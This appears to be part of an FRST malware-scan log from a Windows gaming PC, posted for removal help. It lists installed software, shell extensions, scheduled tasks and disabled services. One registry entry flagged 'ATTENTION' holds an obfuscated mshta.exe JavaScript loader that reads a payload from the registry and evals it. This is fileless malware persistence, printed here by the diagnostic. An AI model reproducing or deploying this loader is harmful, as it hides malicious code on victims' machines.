Microsoft Xbox One Controller for Windows (HKLM\...\{DC2CB48C-FD96-48EB-A36A-7D995BB587EB}) (Version: 1.0.2 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 57.0.4 (x64 en-US) (HKLM\...\Mozilla Firefox 57.0.4 (x64 en-US)) (Version: 57.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 57.0.4.6577 - Mozilla)
MSI Afterburner 4.0.0 (HKLM-x32\...\Afterburner) (Version: 4.0.0 - MSI Co., LTD)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Mumble 1.2.10 (HKLM-x32\...\{BA360AD9-B847-48EF-A182-6345703284E9}) (Version: 1.2.10 - Thorvald Natvig)
Nidhogg (HKLM-x32\...\TmlkaG9nZw==_is1) (Version: 1 - )
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.6.9 - Notepad++ Team)
NVIDIA 3D Vision Driver 391.01 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 391.01 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.12.0.84 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.12.0.84 - NVIDIA Corporation)
NVIDIA Graphics Driver 391.01 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 391.01 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Orbital Gear v1.3.3 (HKLM-x32\...\Orbital Gear_is1) (Version: 1.3.3 - OUTLAWS)
Origin (HKLM-x32\...\Origin) (Version: 9.11.5.17432 - Electronic Arts, Inc.)
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
paint.net (HKLM\...\{F10AAD91-58DF-44EC-A647-810197141667}) (Version: 4.0.19 - dotPDN LLC)
Patch v4.17b Update (HKLM-x32\...\{THEGUILDREN-0010-2010-300520102330}_is1) (Version:  - RUNEFORGE Games Studios)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.986 - Even Balance, Inc.)
pyfa version 1.5.1 (Oceanus 1.0) (HKLM-x32\...\{3DA39096-C08D-49CD-90E0-1D177F32C8AA}_is1) (Version: 1.5.1 (Oceanus 1.0) - pyfa)
qBittorrent 3.3.7 (HKLM-x32\...\qBittorrent) (Version: 3.3.7 - The qBittorrent project)
R for Windows 3.2.2 (HKLM\...\R for Windows 3.2.2_is1) (Version: 3.2.2 - R Core Team)
Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 2.20.15.1104 - Razer Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.67.1226.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6954 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Redout (HKLM-x32\...\Redout_is1) (Version:  - )
Resident Evil 6 (HKLM-x32\...\Resident Evil 6_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Resident Evil 7 Biohazard (HKLM-x32\...\{1ECBF8F3-7079-44CA-AD32-B2AECBCF636F}_is1) (Version:  - Capcom)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.0.6.1 - Rockstar Games)
RStudio (HKLM-x32\...\RStudio) (Version: 1.0.136 - RStudio)
RUSH Mechanical Keyboard (HKLM-x32\...\{A852EA21-FD88-4840-AE94-3243C9895325}}_is1) (Version:  - )
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.25.0 - SAMSUNG Electronics Co., Ltd.)
Satellite Reign (HKLM-x32\...\1428054996_is1) (Version: 2.7.0.11 - GOG.com)
ScummVM 1.8.1 (HKLM-x32\...\ScummVM_is1) (Version:  - The ScummVM Team)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version:  - Microsoft)
Shadow Tactics - Blades of the Shogun (HKLM-x32\...\1601442230_is1) (Version: 2.0.0.3 - GOG.com)
Shift Happens version 1.0 (HKLM-x32\...\Shift Happens_is1) (Version: 1.0 - Klonk Games Deck13 FFF Bayern)
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
Smart Technology Programming Software 7.0.27.13 (HKLM\...\{BD90BC1C-115D-47E1-B85C-07AE182C3AB8}) (Version: 7.0.27.13 - Mad Catz)
Soldat 1.6.8 (HKLM-x32\...\Soldat_is1) (Version: 1.6.8 - Michal Marcinkowski)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.6.46 - Safer-Networking Ltd.)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Stronghold Crusader Extreme HD (HKLM-x32\...\GOGPACKSTRONGHOLDCRUSADERHD_is1) (Version: 2.2.0.8 - GOG.com)
StrongholdCrusader (HKLM\...\{5a56ddf5-f2fd-4a53-b852-909002f9df30}.sdb) (Version:  - )
SumatraPDF (HKLM-x32\...\SumatraPDF) (Version: 2.4 - Krzysztof Kowalczyk)
Sunless Sea (HKLM-x32\...\1421064427_is1) (Version: 2.4.0.5 - GOG.com)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.36244 - TeamViewer)
The Battle for Middle-earth ™ II (HKLM-x32\...\{2A9F95AB-65A3-432c-8631-B8BC5BF7477A}) (Version:  - )
The Guild 2 - Pirates of the European Seas (HKLM-x32\...\GOGPACKTHEGUILD2PIRATES_is1) (Version: 2.0.0.4 - GOG.com)
The Guild 2 - Renaissance (HKLM-x32\...\1207664873_is1) (Version: 2.0.0.1 - GOG.com)
The Last Door -  Collector's Edition (HKLM-x32\...\GOGPACKTHELASTDOOR_is1) (Version: 2.0.0.3 - GOG.com)
The Red Alert (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\The Red Alert) (Version: 1.2.0.0 - CNC Labs)
The Settlers 3 - Ultimate Collection (HKLM-x32\...\GOGPACKSETTLERS3_is1) (Version: 2.0.0.19 - GOG.com)
The Talos Principle (HKLM-x32\...\The Talos Principle_is1) (Version:  - )
The Walking Dead: Michonne (HKLM-x32\...\The Walking Dead: Michonne_is1) (Version:  - )
The Witness (HKLM\...\dGhld2l0bmVzcw_is1) (Version: 1 - )
The Wolf Among Us (HKLM-x32\...\The Wolf Among Us_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Tom Clancy's Rainbow Six Vegas 2 (HKLM-x32\...\{FD416706-875C-4B0B-A23A-9E740DAE029E}) (Version: 1.03 - Ubisoft)
Torchlight 2 Rapid Respec (HKLM-x32\...\Torchlight 2 Rapid Respec) (Version: 2.04 - Chthon)
Torchlight II © Runic Games version 1 (HKLM-x32\...\Torchlight II © Runic Games_is1) (Version: 1 - )
ToxTrac (HKLM-x32\...\{3149DAFE-23F5-4907-BC83-9C4AA1661BD9}) (Version: 2.60 - Umeå University)
tpsDig2w64 version 2.19 (HKLM\...\tpsDig2w64_is1) (Version: 2.19 - )
Tribes Ascend (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF010}) (Version: 1.1.2860.0 - Hi-Rez Studios)
Tunngle (HKLM-x32\...\Tunngle_is1) (Version: 5.8.4 - Tunngle.net GmbH)
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
Unity Web Player (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unravel™ (HKLM-x32\...\{5105E605-9EE7-4050-9CC0-005093BBF89A}) (Version: 1.0.0.0 - Electronic Arts, Inc.)
Unreal Tournament GOTY (HKLM-x32\...\GOGPACKUT_is1) (Version: 2.0.0.5 - GOG.com)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version:  - Microsoft)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version:  - Microsoft)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version:  - Microsoft)
Uplay (HKLM-x32\...\Uplay) (Version: 25.0 - Ubisoft)
Walking Dead 2 (HKLM-x32\...\Walking Dead 2_is1) (Version:  - Audioslave)
VASSAL (3.2.15) (HKLM\...\VASSAL (3.2.15)) (Version: 3.2.15 - vassalengine.org)
Who's Your Daddy Alpha version 0.1.1 (HKLM-x32\...\{1BE05F6C-F9EB-491B-AE8A-A4B77F60DF4D}_is1) (Version: 0.1.1 - Joe Williams)
Vikings: Wolves of Midgard (HKLM-x32\...\Vikings: Wolves of Midgard_is1) (Version:  - )
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
WinDirStat 1.1.2 (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\WinDirStat) (Version:  - )
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows XP Mode (HKLM\...\{1374CC63-B520-4f3f-98E8-E9020BF01CFF}) (Version: 1.3.7600.16423 - Microsoft Corporation)
WinRAR 5.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.00.0 - win.rar GmbH)
Virtual Audio Cable 4.13 (HKLM\...\Virtual Audio Cable 4.13) (Version:  - )
Vivaldi (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Vivaldi) (Version: 1.13.1008.40 - Vivaldi)
VoiceAttack (HKLM-x32\...\{FBABC026-02F7-46D5-A0F9-3D355D3C3133}) (Version: 1.5.7 - VoiceAttack.com)
Wolfenstein The Old Blood (HKLM-x32\...\Wolfenstein The Old Blood_is1) (Version:  - )
Wolfenstein: The New Order (HKLM-x32\...\V29sZmVuc3RlaW5UaGVOZXdPcmRlcg==_is1) (Version: 1 - )
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
ZTE Handset USB Driver (HKLM\...\{01D42BF0-ED08-463f-8A28-99EB6FEE962B}) (Version:  - ZTE Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

HKU\.DEFAULT\Software\Classes\3d878: "C:\Windows\system32\mshta.exe" "javascript:Qy2pqhd8="cGnOVdL4";bu1=new ActiveXObject("WScript.Shell");s7Wb7IoYn="JcVXE";HAb4P=bu1.RegRead("HKCU\\software\\dovquskjdo\\thbfcp");Z9MeKir="h8c665I";eval(HAb4P);d0jSmzjo4="b4pkxh7";" <==== ATTENTION
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2014-05-12] ()
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers1: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers1: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-02-23] (NVIDIA Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers6: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers6: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2013-08-22] (Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0BBD42E9-A2FA-4576-9890-D0C1FED0E844} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2018-01-10] (NVIDIA Corporation)
Task: {0BFE3D12-EE22-42E2-9D99-08E5014A0294} - System32\Tasks\ASUS\i-Setup225905 => C:\Windows\Intel-Chipset_Win7_8_VER9401017\AsusSetup.exe [2010-09-08] (ASUSTeK Computer Inc.)
Task: {0FEC692B-1674-436D-BBF8-596CCFF7468D} - System32\Tasks\{8D7BD5CC-F762-4C88-83D1-6E0E6114373E} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.7.0.103/nl/abandoninstall?page=tsPlugin
Task: {2816C76A-9AA6-4188-ACEB-4BE0C0DD0E90} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-01-10] (NVIDIA Corporation)
Task: {2EE04458-0CAB-4DFB-ABB0-601043DBF441} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2018-01-10] (NVIDIA Corporation)
Task: {3091ED5C-5B9D-4A68-A3AC-9A27E05EA3A8} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2018-01-10] (NVIDIA Corporation)
Task: {3C201A85-C7D6-4A1C-AC4B-352926B536E5} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2018-01-10] (NVIDIA Corporation)
Task: {57D3EFB8-7DC5-4C47-933B-B64DA7804C52} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {586E3E7E-04DD-4F50-BB9C-C8E54BFFCD13} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-02-06] (Adobe Systems Incorporated)
Task: {5ACD0E5E-1851-4D78-A828-E885A7A38D97} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-01-10] (NVIDIA Corporation)
Task: {79DFCC47-8C8D-4D07-8F11-E20BECC26092} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-09-28] (Piriform Ltd)
Task: {95D233E6-C06E-4569-BE35-EE1FF61B18E7} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {AFE18389-F758-4DAC-8D9B-E3B57C98E691} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-01-10] (NVIDIA Corporation)
Task: {C37FC464-71FD-406A-9BB1-351B799E500C} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => C:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {D7E118E8-48A4-4305-9518-2E81878767D6} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {DF64ABAB-F7B0-43E8-9B1E-22A47ED36357} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {F25664B5-F21D-4C23-B584-2947A5D13292} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-01-10] (NVIDIA Corporation)
Task: {FC3DA8B1-316E-4796-A3FC-79A33A78BC4C} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2017-02-01] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Task: C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe
Task: C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


==================== Loaded Modules (Whitelisted) ==============

2013-11-11 17:27 - 2013-11-11 17:27 - 000066872 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2013-11-11 17:27 - 2013-11-11 17:27 - 000107832 _____ () C:\Windows\SysWOW64\PnkBstrB.exe
2017-07-17 18:30 - 2017-07-17 18:30 - 000863744 _____ () C:\Windows\mod_frst.exe

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\europacasino.com -> www.europacasino.com
IE restricted site: HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\skype.com -> hxxps://apps.skype.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2014-12-06 18:54 - 2014-12-06 18:54 - 000000000 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Martin\AppData\Roaming\DisplayFusion\Wallpaper_1
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
bfe => Firewall Service is not running.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AeLookupSvc => 3
MSCONFIG\Services: ALG => 3
MSCONFIG\Services: AppIDSvc => 3
MSCONFIG\Services: AppMgmt => 3
MSCONFIG\Services: aspnet_state => 3
MSCONFIG\Services: AudioEndpointBuilder => 2
MSCONFIG\Services: AudioSrv => 2
MSCONFIG\Services: AxInstSV => 3
MSCONFIG\Services: BDESVC => 3
MSCONFIG\Services: BEService => 3
MSCONFIG\Services: BFE => 2
MSCONFIG\Services: BITS => 2
MSCONFIG\Services: Browser => 3
MSCONFIG\Services: bthserv => 3
MSCONFIG\Services: CertPropSvc => 3
MSCONFIG\Services: clr_optimization_v4.0.30319_32 => 2
MSCONFIG\Services: clr_optimization_v4.0.30319_64 => 2
MSCONFIG\Services: COMSysApp => 3
MSCONFIG\Services: CryptSvc => 3
MSCONFIG\Services: CscService => 2
MSCONFIG\Services: defragsvc => 3
MSCONFIG\Services: Dhcp => 2
MSCONFIG\Services: DiagTrack => 2
MSCONFIG\Services: DisplayFusionService => 2
MSCONFIG\Services: Dnscache => 2
MSCONFIG\Services: dot3svc => 3
MSCONFIG\Services: DPS => 2
MSCONFIG\Services: EapHost => 3
MSCONFIG\Services: EFS => 3
MSCONFIG\Services: eventlog => 2
MSCONFIG\Services: EventSystem => 2
MSCONFIG\Services: Fax => 3
MSCONFIG\Services: fdPHost => 3
MSCONFIG\Services: FDResPub => 3
MSCONFIG\Services: FlexNet Licensing Service => 3
MSCONFIG\Services: FontCache => 2
MSCONFIG\Services: FontCache3.0.0.0 => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 3
MSCONFIG\Services: Hamachi2Svc => 2
MSCONFIG\Services: hidserv => 3
MSCONFIG\Services: HiPatchService => 2
MSCONFIG\Services: hkmsvc => 3
MSCONFIG\Services: HnGSteamService => 3
MSCONFIG\Services: HomeGroupListener => 3
MSCONFIG\Services: HomeGroupProvider => 3
MSCONFIG\Services: idsvc => 3
MSCONFIG\Services: IEEtwCollectorService => 3
MSCONFIG\Services: IKEEXT => 2
MSCONFIG\Services: IPBusEnum => 3
MSCONFIG\Services: iphlpsvc => 2
MSCONFIG\Services: KeyIso => 3
MSCONFIG\Services: KtmRm => 3
MSCONFIG\Services: LanmanServer => 2
MSCONFIG\Services: LanmanWorkstation => 2
MSCONFIG\Services: lltdsvc => 3
MSCONFIG\Services: lmhosts => 2
MSCONFIG\Services: MMCSS => 2
MSCONFIG\Services: MozillaMaintenance => 3
MSCONFIG\Services: MpsSvc => 2
MSCONFIG\Services: MSDTC => 3
MSCONFIG\Services: MSiSCSI => 3
MSCONFIG\Services: msiserver => 3
MSCONFIG\Services: napagent => 3
MSCONFIG\Services: Netlogon => 3
MSCONFIG\Services: Netman => 3
MSCONFIG\Services: netprofm => 3
MSCONFIG\Services: NlaSvc => 2
MSCONFIG\Services: nsi => 2
MSCONFIG\Services: NvContainerLocalSystem => 2
MSCONFIG\Services: NvContainerNetworkService => 3
MSCONFIG\Services: NVDisplay.ContainerLocalSystem => 2
MSCONFIG\Services: NvTelemetryContainer => 2
MSCONFIG\Services: Origin Client Service => 3
MSCONFIG\Services: ose64 => 3
MSCONFIG\Services: osppsvc => 3
MSCONFIG\Services: p2pimsvc => 3
MSCONFIG\Services: p2psvc => 3
MSCONFIG\Services: PcaSvc => 2
MSCONFIG\Services: PeerDistSvc => 3
MSCONFIG\Services: PerfHost => 3
MSCONFIG\Services: pla => 3
MSCONFIG\Services: PNRPAutoReg => 3
MSCONFIG\Services: PNRPsvc => 3
MSCONFIG\Services: PolicyAgent => 3
MSCONFIG\Services: Power => 2
MSCONFIG\Services: ProtectedStorage => 3
MSCONFIG\Services: QWAVE => 3
MSCONFIG\Services: RasAuto => 3
MSCONFIG\Services: RasMan => 3
MSCONFIG\Services: Razer Game Scanner Service => 2
MSCONFIG\Services: RemoteRegistry => 3
MSCONFIG\Services: RpcLocator => 3
MSCONFIG\Services: SamSs => 2
MSCONFIG\Services: SCardSvr => 3
MSCONFIG\Services: SCPolicySvc => 3
MSCONFIG\Services: SDRSVC => 3
MSCONFIG\Services: SDScannerService => 2
MSCONFIG\Services: SDUpdateService => 2
MSCONFIG\Services: SDWSCService => 2
MSCONFIG\Services: seclogon => 3
MSCONFIG\Services: SENS => 2
MSCONFIG\Services: SensrSvc => 3
MSCONFIG\Services: SessionEnv => 3
MSCONFIG\Services: ShellHWDetection => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SNMPTRAP => 3
MSCONFIG\Services: Spooler => 2
MSCONFIG\Services: sppuinotify => 3
MSCONFIG\Services: SSDPSRV => 3
MSCONFIG\Services: SstpSvc => 3
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: stisvc => 2
MSCONFIG\Services: swprv => 3
MSCONFIG\Services: SysMain => 3
MSCONFIG\Services: TabletInputService => 3
MSCONFIG\Services: TapiSrv => 3
MSCONFIG\Services: TBS => 3
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: TermService => 3
MSCONFIG\Services: Themes => 2
MSCONFIG\Services: THREADORDER => 3
MSCONFIG\Services: TrkWks => 2
MSCONFIG\Services: TrustedInstaller => 3
MSCONFIG\Services: TunngleService => 3
MSCONFIG\Services: UI0Detect => 3
MSCONFIG\Services: UmRdpService => 3
MSCONFIG\Services: upnphost => 3
MSCONFIG\Services: UxSms => 2
MSCONFIG\Services: VaultSvc => 3
MSCONFIG\Services: vds => 3
MSCONFIG\Services: VSS => 3
MSCONFIG\Services: W32Time => 3
MSCONFIG\Services: WatAdminSvc => 3
MSCONFIG\Services: wbengine => 3
MSCONFIG\Services: WbioSrvc => 3
MSCONFIG\Services: wcncsvc => 3
MSCONFIG\Services: WcsPlugInService => 3
MSCONFIG\Services: WdiServiceHost => 3
MSCONFIG\Services: WdiSystemHost => 3
MSCONFIG\Services: WebClient => 3
MSCONFIG\Services: Wecsvc => 3
MSCONFIG\Services: wercplsupport => 3
MSCONFIG\Services: WerSvc => 3
MSCONFIG\Services: WinDefend => 3
MSCONFIG\Services: WinHttpAutoProxySvc => 3
